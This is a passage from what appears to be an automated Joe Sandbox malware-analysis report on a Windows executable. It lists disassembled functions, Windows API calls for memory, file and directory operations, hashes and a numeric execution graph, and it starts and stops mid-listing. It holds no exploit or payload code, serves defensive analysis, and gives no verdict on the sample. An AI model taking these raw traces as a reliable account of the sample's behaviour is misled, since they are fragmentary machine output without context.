                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                          • API String ID: 1220098344-1503883590
                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                          • Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
                                                                          • GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: U1hd.@$%L
                                                                          • API String ID: 2123368496-90655549
                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004093FC Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                          • Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
                                                                          • Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                          • Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:16.6%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:5.5%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:89
                                                                          execution_graph 48529 48b868 48530 48b8a2 48529->48530 48531 48b8ae 48530->48531 48532 48b8a4 48530->48532 48534 48b8bd 48531->48534 48535 48b8e6 48531->48535 48728 409000 MessageBeep 48532->48728 48537 44688c 18 API calls 48534->48537 48540 48b91e 48535->48540 48541 48b8f5 48535->48541 48536 403420 4 API calls 48538 48befa 48536->48538 48539 48b8ca 48537->48539 48542 403400 4 API calls 48538->48542 48729 406b18 48539->48729 48550 48b92d 48540->48550 48551 48b956 48540->48551 48544 44688c 18 API calls 48541->48544 48545 48bf02 48542->48545 48547 48b902 48544->48547 48737 406b68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48547->48737 48553 44688c 18 API calls 48550->48553 48556 48b97e 48551->48556 48557 48b965 48551->48557 48552 48b90d 48738 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48552->48738 48555 48b93a 48553->48555 48739 406b9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48555->48739 48564 48b98d 48556->48564 48565 48b9b2 48556->48565 48741 4071e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 48557->48741 48559 48b945 48740 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48559->48740 48562 48b96d 48742 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48562->48742 48566 44688c 18 API calls 48564->48566 48569 48b9ea 48565->48569 48570 48b9c1 48565->48570 48567 48b99a 48566->48567 48743 407210 48567->48743 48575 48b9f9 48569->48575 48576 48ba22 48569->48576 48572 44688c 18 API calls 48570->48572 48571 48b9a2 48746 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48571->48746 48574 48b9ce 48572->48574 48747 42c6e0 48574->48747 48578 44688c 18 API calls 48575->48578 48583 48ba6e 48576->48583 48584 48ba31 48576->48584 48580 48ba06 48578->48580 48757 407160 8 API calls 48580->48757 48589 48ba7d 48583->48589 48590 48baa6 48583->48590 48586 44688c 18 API calls 48584->48586 48585 48ba11 48758 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48585->48758 48588 48ba40 48586->48588 48591 44688c 18 API calls 48588->48591 48593 44688c 18 API calls 48589->48593 48596 48bade 48590->48596 48597 48bab5 48590->48597 48592 48ba51 48591->48592 48759 48b56c 8 API calls 48592->48759 48595 48ba8a 48593->48595 48761 42c780 48595->48761 48606 48baed 48596->48606 48607 48bb16 48596->48607 48600 44688c 18 API calls 48597->48600 48598 48ba5d 48760 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48598->48760 48603 48bac2 48600->48603 48767 42c7a8 48603->48767 48609 44688c 18 API calls 48606->48609 48612 48bb4e 48607->48612 48613 48bb25 48607->48613 48611 48bafa 48609->48611 48776 42c7d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 48611->48776 48619 48bb5d 48612->48619 48620 48bb86 48612->48620 48616 44688c 18 API calls 48613->48616 48615 48bb05 48777 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48615->48777 48618 48bb32 48616->48618 48778 42c808 48618->48778 48622 44688c 18 API calls 48619->48622 48627 48bbd2 48620->48627 48628 48bb95 48620->48628 48624 48bb6a 48622->48624 48784 42c830 48624->48784 48633 48bbe1 48627->48633 48634 48bc24 48627->48634 48630 44688c 18 API calls 48628->48630 48632 48bba4 48630->48632 48635 44688c 18 API calls 48632->48635 48636 44688c 18 API calls 48633->48636 48641 48bc33 48634->48641 48642 48bc97 48634->48642 48637 48bbb5 48635->48637 48638 48bbf4 48636->48638 48790 42c424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 48637->48790 48643 44688c 18 API calls 48638->48643 48640 48bbc1 48791 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48640->48791 48716 44688c 48641->48716 48649 48bcd6 48642->48649 48650 48bca6 48642->48650 48646 48bc05 48643->48646 48792 48b764 12 API calls 48646->48792 48661 48bd15 48649->48661 48662 48bce5 48649->48662 48653 44688c 18 API calls 48650->48653 48652 48bc13 48793 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48652->48793 48656 48bcb3 48653->48656 48654 48bc4e 48657 48bc52 48654->48657 48658 48bc87 48654->48658 48796 45128c 48656->48796 48660 44688c 18 API calls 48657->48660 48795 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48658->48795 48665 48bc61 48660->48665 48671 48bd54 48661->48671 48672 48bd24 48661->48672 48666 44688c 18 API calls 48662->48666 48721 451604 48665->48721 48667 48bcf2 48666->48667 48803 4510f4 48667->48803 48679 48bd9c 48671->48679 48680 48bd63 48671->48680 48675 44688c 18 API calls 48672->48675 48673 48bc71 48794 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48673->48794 48674 48bcff 48810 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48674->48810 48678 48bd31 48675->48678 48811 451794 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 48678->48811 48687 48bdab 48679->48687 48688 48bde4 48679->48688 48682 44688c 18 API calls 48680->48682 48684 48bd72 48682->48684 48683 48bd3e 48812 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48683->48812 48686 44688c 18 API calls 48684->48686 48689 48bd83 48686->48689 48690 44688c 18 API calls 48687->48690 48693 48bead 48688->48693 48694 48bdf7 48688->48694 48813 446b0c 48689->48813 48691 48bdba 48690->48691 48692 44688c 18 API calls 48691->48692 48695 48bdcb 48692->48695 48700 48b8a9 48693->48700 48822 446830 18 API calls 48693->48822 48697 44688c 18 API calls 48694->48697 48701 446b0c 5 API calls 48695->48701 48698 48be24 48697->48698 48699 44688c 18 API calls 48698->48699 48702 48be3b 48699->48702 48700->48536 48701->48700 48819 407d44 7 API calls 48702->48819 48704 48bec6 48823 42e670 FormatMessageA 48704->48823 48709 48be5d 48710 44688c 18 API calls 48709->48710 48711 48be71 48710->48711 48820 408470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48711->48820 48713 48be7c 48821 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48713->48821 48715 48be88 48717 446894 48716->48717 48828 43590c 48717->48828 48719 4468b3 48720 42c528 7 API calls 48719->48720 48720->48654 48858 4510a8 48721->48858 48723 451621 48723->48673 48724 45161d 48724->48723 48725 451645 MoveFileA GetLastError 48724->48725 48864 4510e4 48725->48864 48728->48700 48730 406b27 48729->48730 48731 406b40 48730->48731 48732 406b49 48730->48732 48733 403400 4 API calls 48731->48733 48867 403778 48732->48867 48734 406b47 48733->48734 48736 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48734->48736 48736->48700 48737->48552 48738->48700 48739->48559 48740->48700 48741->48562 48742->48700 48874 403738 48743->48874 48746->48700 48748 403738 48747->48748 48749 42c703 GetFullPathNameA 48748->48749 48750 42c726 48749->48750 48751 42c70f 48749->48751 48753 403494 4 API calls 48750->48753 48751->48750 48752 42c717 48751->48752 48754 4034e0 4 API calls 48752->48754 48755 42c724 48753->48755 48754->48755 48756 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48755->48756 48756->48700 48757->48585 48758->48700 48759->48598 48760->48700 48876 42c678 48761->48876 48764 403778 4 API calls 48765 42c7a1 48764->48765 48766 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48765->48766 48766->48700 48891 42c594 48767->48891 48770 42c7c5 48772 403778 4 API calls 48770->48772 48771 42c7bc 48773 403400 4 API calls 48771->48773 48774 42c7c3 48772->48774 48773->48774 48775 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48774->48775 48775->48700 48776->48615 48777->48700 48779 42c678 IsDBCSLeadByte 48778->48779 48780 42c818 48779->48780 48781 403778 4 API calls 48780->48781 48782 42c82a 48781->48782 48783 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48782->48783 48783->48700 48785 42c678 IsDBCSLeadByte 48784->48785 48786 42c840 48785->48786 48787 403778 4 API calls 48786->48787 48788 42c851 48787->48788 48789 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48788->48789 48789->48700 48790->48640 48791->48700 48792->48652 48793->48700 48794->48700 48795->48700 48797 4510a8 2 API calls 48796->48797 48798 4512a2 48797->48798 48799 4512a6 48798->48799 48800 4512c2 DeleteFileA GetLastError 48798->48800 48802 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48799->48802 48801 4510e4 Wow64RevertWow64FsRedirection 48800->48801 48801->48799 48802->48700 48804 4510a8 2 API calls 48803->48804 48805 45110a 48804->48805 48806 45110e 48805->48806 48807 45112c CreateDirectoryA GetLastError 48805->48807 48806->48674 48808 4510e4 Wow64RevertWow64FsRedirection 48807->48808 48809 451152 48808->48809 48809->48674 48810->48700 48811->48683 48812->48700 48814 446b14 48813->48814 48894 435c74 VariantClear 48814->48894 48816 446b37 48818 446b4e 48816->48818 48895 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48816->48895 48818->48700 48819->48709 48820->48713 48821->48715 48822->48704 48824 42e696 48823->48824 48825 4034e0 4 API calls 48824->48825 48826 42e6b3 48825->48826 48827 446be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 48826->48827 48827->48700 48829 435918 48828->48829 48830 43593a 48828->48830 48829->48830 48848 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48829->48848 48831 4359bd 48830->48831 48832 435981 48830->48832 48833 4359b1 48830->48833 48834 4359a5 48830->48834 48835 43598d 48830->48835 48841 435999 48830->48841 48857 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48831->48857 48849 403510 48832->48849 48856 4040e8 18 API calls 48833->48856 48852 403494 48834->48852 48840 403510 4 API calls 48835->48840 48839 4359ce 48839->48719 48845 435996 48840->48845 48841->48719 48845->48719 48847 4359ba 48847->48719 48848->48830 48850 4034e0 4 API calls 48849->48850 48851 40351d 48850->48851 48851->48719 48854 403498 48852->48854 48853 4034ba 48853->48719 48854->48853 48855 402660 4 API calls 48854->48855 48855->48853 48856->48847 48857->48839 48859 4510b6 48858->48859 48860 4510b2 48858->48860 48861 4510bf Wow64DisableWow64FsRedirection 48859->48861 48862 4510d8 SetLastError 48859->48862 48860->48724 48863 4510d3 48861->48863 48862->48863 48863->48724 48865 4510f3 48864->48865 48866 4510e9 Wow64RevertWow64FsRedirection 48864->48866 48865->48673 48866->48865 48868 4037aa 48867->48868 48869 40377d 48867->48869 48870 403400 4 API calls 48868->48870 48869->48868 48872 403791 48869->48872 48871 4037a0 48870->48871 48871->48734 48873 4034e0 4 API calls 48872->48873 48873->48871 48875 40373c SetCurrentDirectoryA 48874->48875 48875->48571 48881 42c59c 48876->48881 48878 42c6d7 48878->48764 48879 42c68d 48879->48878 48888 42c3b4 IsDBCSLeadByte 48879->48888 48884 42c5ad 48881->48884 48882 42c611 48885 42c60c 48882->48885 48890 42c3b4 IsDBCSLeadByte 48882->48890 48884->48882 48887 42c5cb 48884->48887 48885->48879 48887->48885 48889 42c3b4 IsDBCSLeadByte 48887->48889 48888->48879 48889->48887 48890->48885 48892 42c59c IsDBCSLeadByte 48891->48892 48893 42c59b 48892->48893 48893->48770 48893->48771 48894->48816 48895->48818 48896 40ce60 48897 40ce72 48896->48897 48898 40ce6d 48896->48898 48900 406eb0 CloseHandle 48898->48900 48900->48897 48037 402584 48038 402598 48037->48038 48039 4025ab 48037->48039 48067 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 48038->48067 48040 4025c2 RtlEnterCriticalSection 48039->48040 48041 4025cc 48039->48041 48040->48041 48053 4023b4 13 API calls 48041->48053 48044 40259d 48044->48039 48045 4025a1 48044->48045 48046 4025d9 48049 402635 48046->48049 48050 40262b RtlLeaveCriticalSection 48046->48050 48047 4025d5 48047->48046 48054 402088 48047->48054 48050->48049 48051 4025e5 48051->48046 48068 402210 9 API calls 48051->48068 48053->48047 48055 40209c 48054->48055 48056 4020af 48054->48056 48075 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 48055->48075 48058 4020c6 RtlEnterCriticalSection 48056->48058 48061 4020d0 48056->48061 48058->48061 48059 4020a1 48059->48056 48060 4020a5 48059->48060 48063 402106 48060->48063 48061->48063 48069 401f94 48061->48069 48063->48051 48065 4021f1 RtlLeaveCriticalSection 48066 4021fb 48065->48066 48066->48051 48067->48044 48068->48046 48072 401fa4 48069->48072 48070 401fd0 48074 401ff4 48070->48074 48081 401db4 48070->48081 48072->48070 48072->48074 48076 401f0c 48072->48076 48074->48065 48074->48066 48075->48059 48085 40178c 48076->48085 48080 401f29 48080->48072 48082 401dd2 48081->48082 48083 401e02 48081->48083 48082->48074 48083->48082 48108 401d1c 48083->48108 48089 4017a8 48085->48089 48086 4017b2 48104 401678 VirtualAlloc 48086->48104 48089->48086 48090 40180f 48089->48090 48093 401803 48089->48093 48096 4014e4 48089->48096 48105 4013e0 LocalAlloc 48089->48105 48090->48080 48095 401e80 9 API calls 48090->48095 48092 4017be 48092->48090 48106 4015c0 VirtualFree 48093->48106 48095->48080 48097 4014f3 VirtualAlloc 48096->48097 48099 401520 48097->48099 48100 401543 48097->48100 48107 401398 LocalAlloc 48099->48107 48100->48089 48102 40152c 48102->48100 48103 401530 VirtualFree 48102->48103 48103->48100 48104->48092 48105->48089 48106->48090 48107->48102 48109 401d2e 48108->48109 48110 401d51 48109->48110 48111 401d63 48109->48111 48121 401940 48110->48121 48113 401940 3 API calls 48111->48113 48114 401d61 48113->48114 48120 401d79 48114->48120 48131 401bf8 9 API calls 48114->48131 48116 401d88 48117 401da2 48116->48117 48132 401c4c 9 API calls 48116->48132 48133 401454 LocalAlloc 48117->48133 48120->48082 48122 401966 48121->48122 48123 4019bf 48121->48123 48134 40170c 48122->48134 48123->48114 48127 401983 48128 40199a 48127->48128 48139 4015c0 VirtualFree 48127->48139 48128->48123 48140 401454 LocalAlloc 48128->48140 48131->48116 48132->48117 48133->48120 48137 401743 48134->48137 48135 401783 48138 4013e0 LocalAlloc 48135->48138 48136 40175d VirtualFree 48136->48137 48137->48135 48137->48136 48138->48127 48139->48128 48140->48123 48901 47b0a3 48902 47b0ac 48901->48902 48904 47b0d7 48901->48904 48902->48904 48905 47b0c9 48902->48905 48903 47b116 48907 47b136 48903->48907 48908 47b129 48903->48908 48904->48903 49280 479aa8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48904->49280 49278 471f48 162 API calls 48905->49278 48910 47b150 48907->48910 48911 47b13f 48907->48911 48913 47b12d 48908->48913 48914 47b16b 48908->48914 49283 479ce4 37 API calls 48910->49283 49282 479c74 37 API calls 48911->49282 48912 47b109 49281 479c74 37 API calls 48912->49281 48921 47b131 48913->48921 48925 47b1ae 48913->48925 48926 47b1c9 48913->48926 48918 47b174 48914->48918 48919 47b18f 48914->48919 48915 47b0ce 48915->48904 49279 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48915->49279 49284 479ce4 37 API calls 48918->49284 49285 479ce4 37 API calls 48919->49285 48929 47b1f2 48921->48929 48930 47b210 48921->48930 49286 479ce4 37 API calls 48925->49286 49287 479ce4 37 API calls 48926->49287 48931 47b207 48929->48931 49288 479c74 37 API calls 48929->49288 49290 479940 24 API calls 48930->49290 49289 479940 24 API calls 48931->49289 48935 47b20e 48936 47b226 48935->48936 48937 47b220 48935->48937 48938 47b224 48936->48938 48939 479c50 37 API calls 48936->48939 48937->48938 49017 479c50 48937->49017 49022 47722c 48938->49022 48939->48938 49351 4795d4 37 API calls 49017->49351 49019 479c6b 49352 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49019->49352 49353 42d774 GetWindowsDirectoryA 49022->49353 49024 47724a 49025 403450 4 API calls 49024->49025 49026 477257 49025->49026 49355 42d7a0 GetSystemDirectoryA 49026->49355 49028 47725f 49029 403450 4 API calls 49028->49029 49030 47726c 49029->49030 49357 42d7cc 49030->49357 49032 477274 49033 403450 4 API calls 49032->49033 49034 477281 49033->49034 49035 4772a6 49034->49035 49036 47728a 49034->49036 49037 403400 4 API calls 49035->49037 49413 42d0e4 49036->49413 49039 4772a4 49037->49039 49042 4772eb 49039->49042 49043 42c7a8 5 API calls 49039->49043 49041 403450 4 API calls 49041->49039 49361 4770b4 49042->49361 49045 4772c6 49043->49045 49047 403450 4 API calls 49045->49047 49050 4772d3 49047->49050 49048 403450 4 API calls 49049 477307 49048->49049 49051 477325 49049->49051 49052 4035c0 4 API calls 49049->49052 49050->49042 49054 403450 4 API calls 49050->49054 49053 4770b4 8 API calls 49051->49053 49052->49051 49055 477334 49053->49055 49054->49042 49056 403450 4 API calls 49055->49056 49057 477341 49056->49057 49058 477369 49057->49058 49059 42c36c 5 API calls 49057->49059 49060 4773d0 49058->49060 49064 4770b4 8 API calls 49058->49064 49061 477357 49059->49061 49062 4773fa 49060->49062 49063 4773d9 49060->49063 49066 4035c0 4 API calls 49061->49066 49372 42c36c 49062->49372 49067 42c36c 5 API calls 49063->49067 49068 477381 49064->49068 49066->49058 49071 4773e6 49067->49071 49069 403450 4 API calls 49068->49069 49072 47738e 49069->49072 49070 477407 49382 4035c0 49070->49382 49074 4035c0 4 API calls 49071->49074 49076 4773a1 49072->49076 49421 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49072->49421 49075 4773f8 49074->49075 49404 477198 49075->49404 49078 4770b4 8 API calls 49076->49078 49080 4773b0 49078->49080 49082 403450 4 API calls 49080->49082 49084 4773bd 49082->49084 49083 403400 4 API calls 49085 477433 49083->49085 49084->49060 49422 451cc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49084->49422 49087 477688 49085->49087 49088 477690 49087->49088 49088->49088 49448 4523a8 49088->49448 49091 403450 4 API calls 49092 4776bd 49091->49092 49093 403494 4 API calls 49092->49093 49094 4776ca 49093->49094 49466 40357c 49094->49466 49096 4776d8 49097 455bc8 24 API calls 49096->49097 49098 4776e0 49097->49098 49099 4776f3 49098->49099 49496 4553bc 6 API calls 49098->49496 49101 42c36c 5 API calls 49099->49101 49102 477700 49101->49102 49103 4035c0 4 API calls 49102->49103 49104 477710 49103->49104 49105 47771a CreateDirectoryA 49104->49105 49106 477780 49105->49106 49107 477724 GetLastError 49105->49107 49108 4035c0 4 API calls 49106->49108 49109 4508e0 4 API calls 49107->49109 49110 477795 49108->49110 49111 47773c 49109->49111 49480 477630 49110->49480 49497 406cd0 19 API calls 49111->49497 49115 47774c 49117 42e670 5 API calls 49115->49117 49119 47775c 49117->49119 49498 4508b0 49119->49498 49278->48915 49280->48912 49281->48903 49282->48921 49283->48921 49284->48921 49285->48921 49286->48921 49287->48921 49288->48931 49289->48935 49290->48935 49351->49019 49354 42d795 49353->49354 49354->49024 49356 42d7c1 49355->49356 49356->49028 49358 403400 4 API calls 49357->49358 49359 